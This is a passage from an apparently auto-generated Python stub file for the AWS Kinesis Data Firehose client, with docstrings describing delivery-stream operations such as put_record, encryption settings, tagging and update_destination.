'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
'RedshiftDestinationDescription': {
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ElasticsearchDestinationDescription': {
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedDocumentsOnly'|'AllDocuments',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'VpcConfigurationDescription': {
'SubnetIds': [
'string',
],
'RoleARN': 'string',
'SecurityGroupIds': [
'string',
],
'VpcId': 'string'
}
},
'SplunkDestinationDescription': {
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3DestinationDescription': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
},
],
'HasMoreDestinations': True|False
}
}
:returns:
DirectPut : Provider applications access the delivery stream directly.
KinesisStreamAsSource : The delivery stream uses a Kinesis data stream as a source.
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL for a client method and its arguments.

    :type ClientMethod: string
    :param ClientMethod: The name of the client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ClientMethod.
    :type ExpiresIn: int
    :param ExpiresIn: Number of seconds the presigned URL stays valid.
        Defaults to one hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The HTTP method to use in the generated URL. By
        default, the method from the operation's model is used.
    """
    return None
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name; identical to the client
        method name (e.g. for client.create_foo(**kwargs), pass
        'create_foo'). Only usable if the operation supports pagination,
        i.e. client.get_paginator('create_foo') succeeds.
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    return None
def get_waiter(waiter_name=None):
    """Return an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters
        section of the service documentation for the available waiters.
    :rtype: botocore.waiter.Waiter
    """
    return None
def list_delivery_streams(Limit=None, DeliveryStreamType=None, ExclusiveStartDeliveryStreamName=None):
    """List your delivery streams in alphabetical order of their names.

    The full set of streams may be too large for a single call. Use the
    Limit parameter to cap the page size; if HasMoreDeliveryStreams is
    true in the output, request the next page by calling again with
    ExclusiveStartDeliveryStreamName set to the last name returned.
    See also: AWS API Documentation

    :example: response = client.list_delivery_streams(
        Limit=123,
        DeliveryStreamType='DirectPut'|'KinesisStreamAsSource',
        ExclusiveStartDeliveryStreamName='string'
    )
    :type Limit: integer
    :param Limit: The maximum number of delivery streams to list.
        The default value is 10.
    :type DeliveryStreamType: string
    :param DeliveryStreamType: Optional filter on the delivery stream type:
        DirectPut - provider applications access the stream directly;
        KinesisStreamAsSource - the stream uses a Kinesis data stream as
        a source. If omitted, streams of all types are returned.
    :type ExclusiveStartDeliveryStreamName: string
    :param ExclusiveStartDeliveryStreamName: The returned list starts with
        the delivery stream whose name comes alphabetically immediately
        after this name.
    :rtype: dict
    :return: {
        'DeliveryStreamNames': [
            'string',
        ],
        'HasMoreDeliveryStreams': True|False
    }
        DeliveryStreamNames (list of string): names of the delivery streams.
        HasMoreDeliveryStreams (boolean): whether more delivery streams are
        available to list.
    """
    return None
def list_tags_for_delivery_stream(DeliveryStreamName=None, ExclusiveStartTagKey=None, Limit=None):
    """List the tags for the specified delivery stream.

    This operation has a limit of five transactions per second per account.
    See also: AWS API Documentation

    :example: response = client.list_tags_for_delivery_stream(
        DeliveryStreamName='string',
        ExclusiveStartTagKey='string',
        Limit=123
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream
        whose tags you want to list.
    :type ExclusiveStartTagKey: string
    :param ExclusiveStartTagKey: The key to use as the starting point for
        the list; all tags occurring after this key are returned.
    :type Limit: integer
    :param Limit: The number of tags to return. If this is less than the
        total number of tags on the stream, HasMoreTags is true in the
        response; list the rest by setting ExclusiveStartTagKey to the
        last key returned.
    :rtype: dict
    :return: {
        'Tags': [
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        'HasMoreTags': True|False
    }
        Tags: tags on DeliveryStreamName, starting with the first tag after
        ExclusiveStartTagKey and up to Limit. Each tag is a key-value pair:
        Key (string) - unique identifier, max 128 characters; valid
        characters: Unicode letters, digits, white space, _ . / = + - % @.
        Value (string) - optional description, max 256 characters; same
        valid character set.
        HasMoreTags (boolean): if true, more tags are available; call again
        with ExclusiveStartTagKey set to the last key returned.
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.LimitExceededException
    """
    return None
def put_record(DeliveryStreamName=None, Record=None):
    """Write a single data record into a Kinesis Data Firehose delivery stream.

    To write multiple records in one call, use PutRecordBatch. Applications
    using these operations are referred to as producers. By default, each
    delivery stream can take in up to 2,000 transactions per second, 5,000
    records per second, or 5 MB per second; PutRecord and PutRecordBatch
    share these limits as an aggregate per stream.

    The record consists of a data blob of any kind of data, up to 1,000 KB
    in size -- e.g. a log-file segment, geographic location data, website
    clickstream data. Firehose buffers records before delivery; to
    disambiguate blobs at the destination, a common solution is to embed
    delimiters (such as a newline) in the data so consumers can parse
    individual items.

    The operation returns a RecordId, a unique string per record that
    producers can use for auditability and investigation. On
    ServiceUnavailableException, back off and retry; if it persists, the
    stream's throughput limits may have been exceeded. Records are stored
    for 24 hours from the time they are added while Firehose tries to
    deliver them; if the destination is unreachable for more than 24
    hours, the data is no longer available.
    See also: AWS API Documentation

    :example: response = client.put_record(
        DeliveryStreamName='string',
        Record={
            'Data': b'bytes'
        }
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream.
    :type Record: dict
    :param Record: [REQUIRED] The record. Data (bytes, REQUIRED): the data
        blob, base64-encoded when serialized; maximum size before
        base64-encoding is 1,000 KiB.
    :rtype: dict
    :return: {
        'RecordId': 'string',
        'Encrypted': True|False
    }
        RecordId (string): the ID of the record.
        Encrypted (boolean): whether server-side encryption (SSE) was
        enabled during this operation.
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.InvalidKMSResourceException,
        Firehose.Client.exceptions.ServiceUnavailableException
    """
    return None
def put_record_batch(DeliveryStreamName=None, Records=None):
    """Write multiple data records into a delivery stream in a single call.

    This achieves higher per-producer throughput than single-record writes
    (use PutRecord for those). By default, each delivery stream can take in
    up to 2,000 transactions per second, 5,000 records per second, or 5 MB
    per second, aggregated across PutRecord and PutRecordBatch.

    Each request supports up to 500 records; each record can be as large
    as 1,000 KB (before 64-bit encoding), up to a 4 MB limit for the
    entire request. These limits cannot be changed. Firehose buffers
    records before delivery; embed delimiters (such as a newline) in the
    data if consumers need to split individual items at the destination.

    The response includes FailedPutCount and a RequestResponses array
    correlated one-to-one, in order, with the request records. Even when
    the call succeeds, FailedPutCount may be greater than 0: a
    successfully processed entry carries a unique RecordId, while a failed
    entry carries ErrorCode (ServiceUnavailableException or
    InternalFailure) and ErrorMessage. A single record failure does not
    stop processing of subsequent records. If FailedPutCount > 0, resend
    only the records that might have failed, and handle duplicates at the
    destination. On ServiceUnavailableException, back off and retry; if it
    persists, throughput limits may have been exceeded. Records are stored
    for 24 hours while delivery is attempted; data is unavailable after
    the destination is unreachable for more than 24 hours.
    See also: AWS API Documentation

    :example: response = client.put_record_batch(
        DeliveryStreamName='string',
        Records=[
            {
                'Data': b'bytes'
            },
        ]
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream.
    :type Records: list
    :param Records: [REQUIRED] One or more records. Each (dict) is the
        unit of data in a delivery stream: Data (bytes, REQUIRED) - the
        data blob, base64-encoded when serialized; maximum size before
        base64-encoding is 1,000 KiB.
    :rtype: dict
    :return: {
        'FailedPutCount': 123,
        'Encrypted': True|False,
        'RequestResponses': [
            {
                'RecordId': 'string',
                'ErrorCode': 'string',
                'ErrorMessage': 'string'
            },
        ]
    }
        FailedPutCount (integer): number of records that might have failed
        processing; check it to decide which records to resend.
        Encrypted (boolean): whether server-side encryption (SSE) was
        enabled during this operation.
        RequestResponses (list): per-record results, same index order as
        the request array; each has RecordId on success, or ErrorCode and
        ErrorMessage on failure.
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.InvalidKMSResourceException,
        Firehose.Client.exceptions.ServiceUnavailableException
    """
    return None
def start_delivery_stream_encryption(DeliveryStreamName=None, DeliveryStreamEncryptionConfigurationInput=None):
    """Enable server-side encryption (SSE) for the delivery stream.

    This operation is asynchronous and returns immediately. Firehose first
    sets the stream's encryption Status (in
    DeliveryStreamEncryptionConfiguration) to ENABLING, then ENABLED; on
    failure it becomes ENABLING_FAILED. Reads and writes continue during
    ENABLING, but data is not yet encrypted; it can take up to 5 seconds
    after the status becomes ENABLED before all written records are
    encrypted. Check PutRecordOutput$Encrypted /
    PutRecordBatchOutput$Encrypted to see whether a write was encrypted,
    and DescribeDeliveryStream for the stream's encryption status.

    You may invoke this on an already-encrypted stream to change the CMK
    ARN or its type and ARN. When replacing a CUSTOMER_MANAGED_CMK,
    Firehose schedules the old CMK's grant for retirement; for a new
    CUSTOMER_MANAGED_CMK it creates a grant to encrypt/decrypt data. If a
    change attempt yields ENABLING_FAILED, encryption remains enabled with
    the old CMK; retry with a valid, enabled CMK whose key policy does not
    deny Firehose the KMS encrypt/decrypt permissions. SSE can be enabled
    only for streams with DirectPut as their source.
    StartDeliveryStreamEncryption and StopDeliveryStreamEncryption share a
    combined limit of 25 calls per delivery stream per 24 hours.
    See also: AWS API Documentation

    :example: response = client.start_delivery_stream_encryption(
        DeliveryStreamName='string',
        DeliveryStreamEncryptionConfigurationInput={
            'KeyARN': 'string',
            'KeyType': 'AWS_OWNED_CMK'|'CUSTOMER_MANAGED_CMK'
        }
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream
        for which to enable server-side encryption (SSE).
    :type DeliveryStreamEncryptionConfigurationInput: dict
    :param DeliveryStreamEncryptionConfigurationInput: The type and ARN of
        the KMS key needed for SSE.
        KeyARN (string): required when KeyType is CUSTOMER_MANAGED_CMK;
        with AWS_OWNED_CMK, Firehose uses a service-account CMK.
        KeyType (string, REQUIRED): type of customer master key (CMK) to
        use; default AWS_OWNED_CMK. With CUSTOMER_MANAGED_CMK, Firehose
        calls KMS CreateGrant so it can use the key, and manages that
        grant; changing the CMK retires the old key's grant. A
        CUSTOMER_MANAGED_CMK can encrypt up to 500 delivery streams
        (LimitExceededException beyond that). Use symmetric CMKs only;
        asymmetric CMKs are not supported.
    :rtype: dict
    :return: {}
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.ResourceInUseException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.LimitExceededException,
        Firehose.Client.exceptions.InvalidKMSResourceException
    """
    return None
def stop_delivery_stream_encryption(DeliveryStreamName=None):
    """Disable server-side encryption (SSE) for the delivery stream.

    This operation is asynchronous and returns immediately. Firehose first
    sets the stream's encryption status to DISABLING, then DISABLED; reads
    and writes continue while the status is DISABLING. It can take up to 5
    seconds after the status becomes DISABLED before all written records
    stop being encrypted. Check PutRecordOutput$Encrypted /
    PutRecordBatchOutput$Encrypted to see whether a write was encrypted,
    and DescribeDeliveryStream for the stream's encryption state.

    If SSE was enabled with a customer managed CMK, Firehose schedules the
    related KMS grant for retirement and retires it once all records have
    been delivered to the destination.
    StartDeliveryStreamEncryption and StopDeliveryStreamEncryption share a
    combined limit of 25 calls per delivery stream per 24 hours.
    See also: AWS API Documentation

    :example: response = client.stop_delivery_stream_encryption(
        DeliveryStreamName='string'
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream
        for which to disable server-side encryption (SSE).
    :rtype: dict
    :return: {}
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.ResourceInUseException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.LimitExceededException
    """
    return None
def tag_delivery_stream(DeliveryStreamName=None, Tags=None):
    """Add or update tags for the specified delivery stream.

    A tag is a key-value pair you define and assign to AWS resources. If a
    given tag already exists, its value is replaced with the value in the
    request. Tags are metadata -- e.g. friendly names and descriptions
    that help distinguish the delivery stream; see "Using Cost Allocation
    Tags" in the AWS Billing and Cost Management User Guide. Each delivery
    stream can have up to 50 tags. This operation has a limit of five
    transactions per second per account.
    See also: AWS API Documentation

    :example: response = client.tag_delivery_stream(
        DeliveryStreamName='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream
        to which you want to add the tags.
    :type Tags: list
    :param Tags: [REQUIRED] A set of key-value pairs to use to create the
        tags. Each (dict) is a tag:
        Key (string, REQUIRED) - unique identifier, max 128 characters;
        valid characters: Unicode letters, digits, white space,
        _ . / = + - % @.
        Value (string) - optional description, max 256 characters; same
        valid character set.
    :rtype: dict
    :return: {}
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.ResourceInUseException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.LimitExceededException
    """
    return None
def untag_delivery_stream(DeliveryStreamName=None, TagKeys=None):
    """Remove tags from the specified delivery stream.

    Removed tags are deleted and cannot be recovered after this operation
    successfully completes. Tags that don't exist are ignored. This
    operation has a limit of five transactions per second per account.
    See also: AWS API Documentation

    :example: response = client.untag_delivery_stream(
        DeliveryStreamName='string',
        TagKeys=[
            'string',
        ]
    )
    :type DeliveryStreamName: string
    :param DeliveryStreamName: [REQUIRED] The name of the delivery stream.
    :type TagKeys: list
    :param TagKeys: [REQUIRED] A list of tag keys (strings); each
        corresponding tag is removed from the delivery stream.
    :rtype: dict
    :return: {}
    :raises: Firehose.Client.exceptions.ResourceNotFoundException,
        Firehose.Client.exceptions.ResourceInUseException,
        Firehose.Client.exceptions.InvalidArgumentException,
        Firehose.Client.exceptions.LimitExceededException
    """
    return None
def update_destination(DeliveryStreamName=None, CurrentDeliveryStreamVersionId=None, DestinationId=None, S3DestinationUpdate=None, ExtendedS3DestinationUpdate=None, RedshiftDestinationUpdate=None, ElasticsearchDestinationUpdate=None, SplunkDestinationUpdate=None):
"""
Updates the specified destination of the specified delivery stream.
Use this operation to change the destination type (for example, to replace the Amazon S3 destination with Amazon Redshift) or change the parameters associated with a destination (for example, to change the bucket name of the Amazon S3 destination). The update might not occur immediately. The target delivery stream remains active while the configurations are updated, so data writes to the delivery stream can continue during this process. The updated configurations are usually effective within a few minutes.
Switching between Amazon ES and other services is not supported. For an Amazon ES destination, you can only update to another Amazon ES destination.
If the destination type is the same, Kinesis Data Firehose merges the configuration parameters specified with the destination configuration that already exists on the delivery stream. If any of the parameters are not specified in the call, the existing values are retained. For example, in the Amazon S3 destination, if EncryptionConfiguration is not specified, then the existing EncryptionConfiguration is maintained on the destination.
If the destination type is not the same, for example, changing the destination from Amazon S3 to Amazon Redshift, Kinesis Data Firehose does not merge any parameters. In this case, all parameters must be specified.
Kinesis Data Firehose uses CurrentDeliveryStreamVersionId to avoid race conditions and conflicting merges. This is a required field, and the service updates the configuration only if the existing configuration has a version ID that matches. After the update is applied successfully, the version ID is updated, and can be retrieved using DescribeDeliveryStream . Use the new version ID to set CurrentDeliveryStreamVersionId in the next call.
See also: AWS API Documentation
Exceptions
:example: response = client.update_destination(
DeliveryStreamName='string',
CurrentDeliveryStreamVersionId='string',
DestinationId='string',
S3DestinationUpdate={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ExtendedS3DestinationUpdate={
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupUpdate': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'DataFormatConversionConfiguration': {
'SchemaConfiguration': {
'RoleARN': 'string',
'CatalogId': 'string',
'DatabaseName': 'string',
'TableName': 'string',
'Region': 'string',
'VersionId': 'string'
},
'InputFormatConfiguration': {
'Deserializer': {
'OpenXJsonSerDe': {
'ConvertDotsInJsonKeysToUnderscores': True|False,
'CaseInsensitive': True|False,
'ColumnToJsonKeyMappings': {
'string': 'string'
}
},
'HiveJsonSerDe': {
'TimestampFormats': [
'string',
]
}
}
},
'OutputFormatConfiguration': {
'Serializer': {
'ParquetSerDe': {
'BlockSizeBytes': 123,
'PageSizeBytes': 123,
'Compression': 'UNCOMPRESSED'|'GZIP'|'SNAPPY',
'EnableDictionaryCompression': True|False,
'MaxPaddingBytes': 123,
'WriterVersion': 'V1'|'V2'
},
'OrcSerDe': {
'StripeSizeBytes': 123,
'BlockSizeBytes': 123,
'RowIndexStride': 123,
'EnablePadding': True|False,
'PaddingTolerance': 123.0,
'Compression': 'NONE'|'ZLIB'|'SNAPPY',
'BloomFilterColumns': [
'string',
],
'BloomFilterFalsePositiveProbability': 123.0,
'DictionaryKeyThreshold': 123.0,
'FormatVersion': 'V0_11'|'V0_12'
}
}
},
'Enabled': True|False
}
},
RedshiftDestinationUpdate={
'RoleARN': 'string',
'ClusterJDBCURL': 'string',
'CopyCommand': {
'DataTableName': 'string',
'DataTableColumns': 'string',
'CopyOptions': 'string'
},
'Username': 'string',
'Password': 'string',
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'S3BackupMode': 'Disabled'|'Enabled',
'S3BackupUpdate': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
ElasticsearchDestinationUpdate={
'RoleARN': 'string',
'DomainARN': 'string',
'ClusterEndpoint': 'string',
'IndexName': 'string',
'TypeName': 'string',
'IndexRotationPeriod': 'NoRotation'|'OneHour'|'OneDay'|'OneWeek'|'OneMonth',
'BufferingHints': {
'IntervalInSeconds': 123,
'SizeInMBs': 123
},
'RetryOptions': {
'DurationInSeconds': 123
},
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
SplunkDestinationUpdate={
'HECEndpoint': 'string',
'HECEndpointType': 'Raw'|'Event',
'HECToken': 'string',
'HECAcknowledgmentTimeoutInSeconds': 123,
'RetryOptions': {
'DurationInSeconds': 123
},
'S3BackupMode': 'FailedEventsOnly'|'AllEvents',
'S3Update': {
'RoleARN': 'string',
'BucketARN': 'string',
'Prefix': 'string',
'ErrorOutputPrefix': 'string',
'BufferingHints': {
'SizeInMBs': 123,
'IntervalInSeconds': 123
},
'CompressionFormat': 'UNCOMPRESSED'|'GZIP'|'ZIP'|'Snappy'|'HADOOP_SNAPPY',
'EncryptionConfiguration': {
'NoEncryptionConfig': 'NoEncryption',
'KMSEncryptionConfig': {
'AWSKMSKeyARN': 'string'
}
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
},
'ProcessingConfiguration': {
'Enabled': True|False,
'Processors': [
{
'Type': 'Lambda',
'Parameters': [
{
'ParameterName': 'LambdaArn'|'NumberOfRetries'|'RoleArn'|'BufferSizeInMBs'|'BufferIntervalInSeconds',
'ParameterValue': 'string'
},
]
},
]
},
'CloudWatchLoggingOptions': {
'Enabled': True|False,
'LogGroupName': 'string',
'LogStreamName': 'string'
}
}
)
:type DeliveryStreamName: string
:param DeliveryStreamName: [REQUIRED]\nThe name of the delivery stream.\n
:type CurrentDeliveryStreamVersionId: string
:param CurrentDeliveryStreamVersionId: [REQUIRED]\nObtain this value from the VersionId result of DeliveryStreamDescription . This value is required, and helps the service perform conditional operations. For example, if there is an interleaving update and this value is null, then the update destination fails. After the update is successful, the VersionId value is updated. The service then performs a merge of the old configuration with the new configuration.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the destination.\n
:type S3DestinationUpdate: dict
